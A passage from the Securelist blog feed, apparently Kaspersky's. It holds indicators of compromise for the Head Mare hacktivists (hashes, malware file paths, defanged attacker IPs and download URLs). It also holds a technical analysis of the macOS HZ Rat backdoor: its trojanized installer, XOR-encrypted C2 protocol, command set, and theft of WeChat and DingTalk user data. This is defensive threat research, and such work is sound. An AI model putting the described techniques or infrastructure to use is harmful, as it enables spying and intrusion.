href="https://opentip.kaspersky.com/9D056138CFB8FF80B0AA53F187D5A576705BD7954D36066EBBBF34A44326C546/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______fc8d5632035f6534&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">9D056138CFB8FF80B0AA53F187D5A576705BD7954D36066EBBBF34A44326C546</a><br /><a href="https://opentip.kaspersky.com/22898920DF011F48F81E27546FECE06A4D84BCE9CDE9F8099AA6A067513191F3/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5596dc5532e702f0&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">22898920DF011F48F81E27546FECE06A4D84BCE9CDE9F8099AA6A067513191F3</a><br /><a href="https://opentip.kaspersky.com/2F1EE997A75F17303ACC1D5A796C26F939EB63871271F0AD9761CDBD592E7569/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ac2dc5721b7e3a54&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">2F1EE997A75F17303ACC1D5A796C26F939EB63871271F0AD9761CDBD592E7569</a><br /><a href="https://opentip.kaspersky.com/AF5A650BF2B3A211C39DCDCAB5F6A5E0F3AF72E25252E6C0A66595F4B4377F0F/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cca20fe426abdbb7&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">AF5A650BF2B3A211C39DCDCAB5F6A5E0F3AF72E25252E6C0A66595F4B4377F0F</a><br /><a href="https://opentip.kaspersky.com/9E9FABBA5790D4843D2E5B027BA7AF148B9F6E7FCDE3FB6BDDC661DBA9CCB836/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______efb8e564d407b26a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">9E9FABBA5790D4843D2E5B027BA7AF148B9F6E7FCDE3FB6BDDC661DBA9CCB836</a><br /><a href="https://opentip.kaspersky.com/B8447EF3F429DAE0AC69C38C18E8BDBFD82170E396200579B6B0EFF4C8B9A984/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3d59e29abc426e96&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">B8447EF3F429DAE0AC69C38C18E8BDBFD82170E396200579B6B0EFF4C8B9A984</a><br /><a href="https://opentip.kaspersky.com/92804FAAAB2175DC501D73E814663058C78C0A042675A8937266357BCFB96C50/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______affec3168409765a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">92804FAAAB2175DC501D73E814663058C78C0A042675A8937266357BCFB96C50</a><br /><a href="https://opentip.kaspersky.com/664B68F2D9F553CC1ACFB370BCFA2CCF5DE78A11697365CF8646704646E89A38/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3d77c983cffd850a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">664B68F2D9F553CC1ACFB370BCFA2CCF5DE78A11697365CF8646704646E89A38</a><br /><a href="https://opentip.kaspersky.com/311EDF744C2E90D7BFC550C893478F43D1D7977694D5DCECF219795F3EB99B86/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8a33f2bfabb75ef5&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">311EDF744C2E90D7BFC550C893478F43D1D7977694D5DCECF219795F3EB99B86</a><br /><a href="https://opentip.kaspersky.com/4C218953296131D0A8E67D70AEEA8FA5AE04FD52F43F8F917145F2EE19F30271/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f8ef19fc840e4720&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">4C218953296131D0A8E67D70AEEA8FA5AE04FD52F43F8F917145F2EE19F30271</a><br /><a href="https://opentip.kaspersky.com/2D3DB0FF10EDD28EE75B7CF39FCF42E9DD51A6867EB5962E8DC1A51D6A5BAC50/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3e13e445dedeadc0&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">2D3DB0FF10EDD28EE75B7CF39FCF42E9DD51A6867EB5962E8DC1A51D6A5BAC50</a><br /><a href="https://opentip.kaspersky.com/DC47D49D63737D12D92FBC74907CD3277739C6C4F00AAA7C7EB561E7342ED65E/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1188c7838099f156&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">DC47D49D63737D12D92FBC74907CD3277739C6C4F00AAA7C7EB561E7342ED65E</a><br />EDA18761F3F6822C13CD7BEAE5AF2ED77A9B4F1DC7A71DF6AB715E7949B8C78B</p><p><strong>File paths:</strong><br />$appdata\Microsoft\Windows\srvhostt.exe<br />$appdata\Microsoft\Windows\srvhost.exe<br />C:\Windows\system32\SrvLog.exe<br />c:\Users\User\AppData\Local\microsoft\windows\srvhosts.exe<br />c:\windows\srvhost.exe<br />c:\ProgramData\OneDrive.exe<br />c:\ProgramData\update\XenAllPasswordPro.exe<br />c:\ProgramData\update\report.html<br />$user\desktop\rsockstun.exe<br />C:\ProgramData\resolver.exe<br />$user\desktop\lockbitlite.exe<br />$user\desktop\lb3.exe<br />C:\ProgramData\lock.exe<br />$user\desktop\x64\mimikatz.exe<br />c:\Users\User\Documents\srvhost.exe<br />c:\microsoft\windows\srchost.exe</p><p><strong>IP addresses</strong><br /><a href="https://opentip.kaspersky.com/188.127.237%5B.%5D46/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e1e2151e6a702294&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">188.127.237[.]46</a><br /><a href="https://opentip.kaspersky.com/45.87.246%5B.%5D169/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cf6378f5092db8c2&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">45.87.246[.]169</a><br /><a href="https://opentip.kaspersky.com/45.87.245%5B.%5D30/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4abb24632cd2710b&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">45.87.245[.]30</a><br /><a href="https://opentip.kaspersky.com/185.80.91%5B.%5D107/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2403839ecea4bc4d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">185.80.91[.]107</a><br /><a href="https://opentip.kaspersky.com/188.127.227%5B.%5D201/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6ba6e3ea1a8b7453&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">188.127.227[.]201</a><br /><a href="https://opentip.kaspersky.com/5.252.176%5B.%5D47/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e38a8d397ea192fa&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]47</a><br /><a href="https://opentip.kaspersky.com/45.11.27%5B.%5D232/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4a0e0822b207b948&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">45.11.27[.]232</a></p><p><strong>URLs</strong><br /><a href="https://opentip.kaspersky.com/188.127.237%5B.%5D46%2Fwinlog.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f5f698fe75734ba9&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">188.127.237[.]46/winlog.exe</a><br /><a href="https://opentip.kaspersky.com/188.127.237%5B.%5D46%2Fservicedll.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cb85f52b56f12ed7&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">188.127.237[.]46/servicedll.exe</a><br /><a href="https://opentip.kaspersky.com/194.87.210%5B.%5D134%2Fgringo%2Fsplhost.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______13f0677d83c35e43&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">194.87.210[.]134/gringo/splhost.exe</a><br /><a href="https://opentip.kaspersky.com/194.87.210%5B.%5D134%2Fgringo%2Fsrvhost.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______282a33cbef240b96&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">194.87.210[.]134/gringo/srvhost.exe</a><br /><a href="https://opentip.kaspersky.com/94.131.113%5B.%5D79%2Fsplhost.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b82ad8711afd2e04&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">94.131.113[.]79/splhost.exe</a><br /><a href="https://opentip.kaspersky.com/94.131.113%5B.%5D79%2Fresolver.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5cc724f6e434a190&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">94.131.113[.]79/resolver.exe</a><br /><a href="https://opentip.kaspersky.com/45.156.21%5B.%5D178%2Fdlldriver.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4e396075e4b96bb7&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">45.156.21[.]178/dlldriver.exe</a><br /><a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2Fngrok.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6aed532045f73791&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/ngrok.exe</a><br /><a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2Fsherlock.ps1/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______196139bb06fe9595&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/sherlock.ps1</a><br /><a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2Fsysm.elf/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______518fd0ba905471e7&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/sysm.elf</a><br /><a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2Fservicedll.rar/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______eeb7f599c878ca29&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/servicedll.rar</a><br /><a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2Freverse.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______012d25de349dc4f9&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/reverse.exe</a><br /><a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2Fsoft_knitting.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______76ec5ffd130cce45&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/soft_knitting.exe</a><br /><a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2Flegislative_cousin.exe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b9be8678ff936bb9&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/legislative_cousin.exe</a><br /><a href="https://opentip.kaspersky.com/5.252.176%5B.%5D77%2F2000x2000.php/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______29ccf77fe14c2b6f&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">5.252.176[.]77/2000×2000.php</a></p><hr><p><a href="#_ftnref1" name="_ftn1"><sup>[1]</sup></a> <a href="https://x.com/head_mare" target="_blank" rel="noopener">https://x.com/head_mare</a> is the account supposedly associated with the hacktivist group. Use this source with caution.</p>]]></content:encoded> <wfw:commentRss>https://securelist.com/head-mare-hacktivists/113555/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30143637/SL-HeadMare-featured-01.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30143637/SL-HeadMare-featured-01-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30143637/SL-HeadMare-featured-01-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30143637/SL-HeadMare-featured-01-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>HZ Rat backdoor for macOS attacks users of China’s DingTalk and WeChat</title> <link>https://securelist.com/hz-rat-attacks-wechat-and-dingtalk/113513/</link> <comments>https://securelist.com/hz-rat-attacks-wechat-and-dingtalk/113513/#comments</comments> <dc:creator><![CDATA[Sergey Puzan]]></dc:creator> <pubDate>Tue, 27 Aug 2024 10:00:43 +0000</pubDate> <category><![CDATA[Malware descriptions]]></category> <category><![CDATA[Apple MacOS]]></category> <category><![CDATA[Backdoor]]></category> <category><![CDATA[Instant Messengers]]></category> <category><![CDATA[Malware]]></category> <category><![CDATA[Malware Descriptions]]></category> <category><![CDATA[Malware Technologies]]></category> <category><![CDATA[Non-Windows Malware]]></category> <category><![CDATA[shell]]></category> <category><![CDATA[Trojan]]></category><category><![CDATA[Unix and macOS malware]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113513</guid> <description><![CDATA[Kaspersky experts discovered a macOS version of the HZ Rat backdoor, which collects user data from WeChat and DingTalk messengers.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27085625/hzrat-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>In June 2024, we discovered a macOS version of the HZ Rat backdoor targeting users of the enterprise messenger DingTalk and the social network and messaging platform WeChat. The samples we found almost exactly replicate the functionality of the Windows version of the backdoor and differ only in the payload, which is received in the form of shell scripts from the attackers’ server. We noticed that some versions of the backdoor use local IP addresses to connect to C2, which led us to believe the threat may be targeted. This also points to an intention to exploit the backdoor for lateral movement through the victim’s network.</p><p>First <a href="https://medium.com/%40DCSO_CyTec/hz-rat-goes-china-506854c5f2e2" target="_blank" rel="noopener">detected by DCSO researchers</a> in November 2022, HZ Rat initially targeted Windows systems and received commands in the form of PowerShell scripts.</p><h2 id="technical-details">Technical details</h2><p>Despite not knowing the malware’s original distribution point, we managed to find an installation package for one of the backdoor samples. The file is named <pre class="crayon-plain-tag">OpenVPNConnect.pkg</pre>:</p><div id="attachment_113520" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113520" class="size-large wp-image-113520" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-1024x552.png" alt="OpenVPNConnect.pkg on VirusTotal" width="1024" height="552" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-1024x552.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-300x162.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-768x414.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-649x350.png 649w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-740x399.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-519x280.png 519w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01-800x432.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153517/hz_rat_attacks_wechat_and_dingtalk_01.png 1431w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113520" class="wp-caption-text">OpenVPNConnect.pkg on VirusTotal</p></div><p>It was uploaded to VirusTotal in July 2023 and, at the time of research, wasn’t detected by any vendor, like other backdoor samples. The installer takes the form of a wrapper for the legitimate “OpenVPN Connect” application, while the <pre class="crayon-plain-tag">MacOS</pre> package directory contains two files in addition to the original client: <pre class="crayon-plain-tag">exe</pre> and <pre class="crayon-plain-tag">init</pre>.</p><div id="attachment_113521" style="width: 715px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153549/hz_rat_attacks_wechat_and_dingtalk_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113521" class="size-full wp-image-113521" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153549/hz_rat_attacks_wechat_and_dingtalk_02.png" alt="Structure of the malicious installation package" width="705" height="318" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153549/hz_rat_attacks_wechat_and_dingtalk_02.png 705w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153549/hz_rat_attacks_wechat_and_dingtalk_02-300x135.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153549/hz_rat_attacks_wechat_and_dingtalk_02-621x280.png 621w" sizes="(max-width: 705px) 100vw, 705px" /></a><p id="caption-attachment-113521" class="wp-caption-text">Structure of the malicious installation package</p></div><p>The system determines which file to run when the application is opened using the <pre class="crayon-plain-tag">Info.plist</pre> configuration file. The first one to be launched is the <pre class="crayon-plain-tag">exe</pre> file – a shell script that runs the <pre class="crayon-plain-tag">init</pre> file, then launches the OpenVPN application:</p><div id="attachment_113522" style="width: 543px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153617/hz_rat_attacks_wechat_and_dingtalk_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113522" class="size-full wp-image-113522" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153617/hz_rat_attacks_wechat_and_dingtalk_03.png" width="533" height="133" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153617/hz_rat_attacks_wechat_and_dingtalk_03.png 533w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153617/hz_rat_attacks_wechat_and_dingtalk_03-300x75.png 300w" sizes="(max-width: 533px) 100vw, 533px" /></a><p id="caption-attachment-113522" class="wp-caption-text">Contents of the “exe” file</p></div><p>The <pre class="crayon-plain-tag">init</pre> file is the actual backdoor. When launched, it establishes a connection to C2 based on the list of IP addresses specified in the backdoor itself. In most cases, the samples used port 8081 for connection. Additionally, we found backdoor samples using private IP addresses to connect to C2.</p><div id="attachment_113523" style="width: 579px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153649/hz_rat_attacks_wechat_and_dingtalk_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113523" class="size-full wp-image-113523" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153649/hz_rat_attacks_wechat_and_dingtalk_04.png" alt="C2 IP addresses in the backdoor code" width="569" height="220" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153649/hz_rat_attacks_wechat_and_dingtalk_04.png 569w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153649/hz_rat_attacks_wechat_and_dingtalk_04-300x116.png 300w" sizes="(max-width: 569px) 100vw, 569px" /></a><p id="caption-attachment-113523" class="wp-caption-text">C2 IP addresses in the backdoor code</p></div><p>All communication with C2 is encrypted using XOR with the key 0x42. To initialize a session, the backdoor sends a random four-byte value, labeled <pre class="crayon-plain-tag">cookie</pre> in the code. Each message has the following structure:</p><ol><li>Message code (1 byte);</li><li>Message length (4 bytes);</li><li>Message text, where the first 4 bytes contain the data size.</li></ol><p>The executable file is written in C++ and contains debugging information, making it easy to identify:</p><div id="attachment_113525" style="width: 375px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153729/hz_rat_attacks_wechat_and_dingtalk_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113525" class="size-full wp-image-113525" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153729/hz_rat_attacks_wechat_and_dingtalk_05.png" alt="Trojan class with malicious payload" width="365" height="258" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153729/hz_rat_attacks_wechat_and_dingtalk_05.png 365w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26153729/hz_rat_attacks_wechat_and_dingtalk_05-300x212.png 300w" sizes="(max-width: 365px) 100vw, 365px" /></a><p id="caption-attachment-113525" class="wp-caption-text">Trojan class with malicious payload</p></div><p>The backdoor supports only four basic commands:</p><table width="100%"><tbody><tr><td style="text-align: center" width="10%"><strong>Code</strong></td><td style="text-align: center" width="40%"><strong>Function name</strong></td><td style="text-align: center" width="50%"><strong>Description</strong></td></tr><tr><td>3, 8, 9</td><td>execute_cmdline</td><td>Execute shell command</td></tr><tr><td>4</td><td>write_file</td><td>Write file to disk</td></tr><tr><td>5</td><td>download_file</td><td>Send file to server</td></tr><tr><td>11</td><td>ping</td><td>Check victim’s availability</td></tr></tbody></table><p>As part of our investigation, we obtained shell commands from the C2 server used to collect the following data about the victim:</p><ul><li>System Integrity Protection (SIP) status;</li><li>System and device information, including:<ul><li>Local IP address;</li><li>Information about Bluetooth devices;</li><li>Information about available Wi-Fi networks, available wireless network adapters and the network the device is connected to;</li><li>Hardware specifications;</li><li>Data storage information;</li></ul></li><li>List of applications;</li><li>User information from WeChat;</li><li>User and organization information from DingTalk;</li><li>Username/website value pairs from Google Password Manager.</li></ul><div id="attachment_113526" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113526" class="size-large wp-image-113526" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-1024x498.png" alt="Getting data from WeChat" width="1024" height="498" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-1024x498.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-300x146.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-768x374.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-719x350.png 719w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-740x360.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-576x280.png 576w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06-800x389.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154147/hz_rat_attacks_wechat_and_dingtalk_06.png 1369w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113526" class="wp-caption-text">Getting data from WeChat</p></div><p>The malware attempts to obtain the victim’s WeChatID, email and phone number from WeChat. This data is stored in plain text in the <pre class="crayon-plain-tag">userinfo.data</pre> file.</p><p>As for DingTalk, attackers are interested in more detailed victim data:</p><ul><li>Name of the organization and department where the user works;</li><li>Username;</li><li>Corporate email address;</li><li>Phone number.</li></ul><p>The script tries to get this data from the <pre class="crayon-plain-tag">orgEmployeeModel</pre> file. If this file is missing, the malware searches for the user’s phone number and email in the <pre class="crayon-plain-tag">sAlimailLoginEmail</pre> file. If it fails again, it attempts to find the user’s email in one of the DingTalk cache files named <pre class="crayon-plain-tag"><date>.holmes.mapping</pre>. These files are also not encrypted and store data in plain text.</p><div id="attachment_113527" style="width: 800px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113527" class="size-full wp-image-113527" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07.png" alt="Getting data from DingTalk" width="790" height="808" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07.png 790w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07-293x300.png 293w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07-768x785.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07-342x350.png 342w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07-740x757.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07-274x280.png 274w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/26154421/hz_rat_attacks_wechat_and_dingtalk_07-50x50.png 50w" sizes="(max-width: 790px) 100vw, 790px" /></a><p id="caption-attachment-113527" class="wp-caption-text">Getting data from DingTalk</p></div><h2 id="infrastructure">Infrastructure</h2><p>At the time of the study, four control servers were active and returning malicious commands. In some cases, as mentioned, among the specified IP addresses there were private ones as well. Such samples were likely used to control a victim’s device with a previously infected computer within their local network that was used as a proxy to redirect the connection to the C2 server. Typically, this helps to hide the presence of malware on the network, since only the device with the proxy will communicate with C2.</p><p>Some of the detected IP addresses have already been seen in malware attacks targeting Windows devices. Their appearance dates back to 2022, with one of the addresses showing up in HZ Rat attacks of that time.</p><p>Almost all of the C2 servers we found are sited in China. The exceptions are two addresses located in the US and the Netherlands.</p><p>We also found that the installation package mentioned above, according to VirusTotal, was previously downloaded from a domain belonging to MiHoYo, a Chinese video game developer:</p><pre class="crayon-plain-tag">hxxp://vpn.mihoyo[.]com/uploads/OpenVPNConnect.zip.</pre><p>It is not yet known for sure how this file got to the legitimate domain and whether the company was hacked.</p><h2 id="conclusion">Conclusion</h2><p>The macOS version of HZ Rat we found shows that the threat actors behind the previous attacks are still active. During the investigation, the malware was only collecting user data, but it could later be used to move laterally across the victim’s network, as suggested by the presence of private IP addresses in some samples. The collected data about victims’ companies and contact information could be used to spy on people of interest and lay the groundwork for future attacks. Also noteworthy is the fact that at the time of the study we had not encountered the use of two of the backdoor commands (write file to disk and send file to server), so the full scope of the attackers’ intentions remains unclear.</p><h2 id="indicators-of-compromise">Indicators of compromise</h2><p><strong>MD5 file hashes</strong><br /><strong>Backdoor</strong><br /><a href="https://opentip.kaspersky.com/0c3201d0743c63075b18023bb8071e73/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______bc3d685c5199eacf&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">0c3201d0743c63075b18023bb8071e73</a> – Mach-O 64-bit x86_64 executable<br /><a href="https://opentip.kaspersky.com/6cc838049ece4fcb36386b7a3032171f/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b28b9cfa49919632&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" 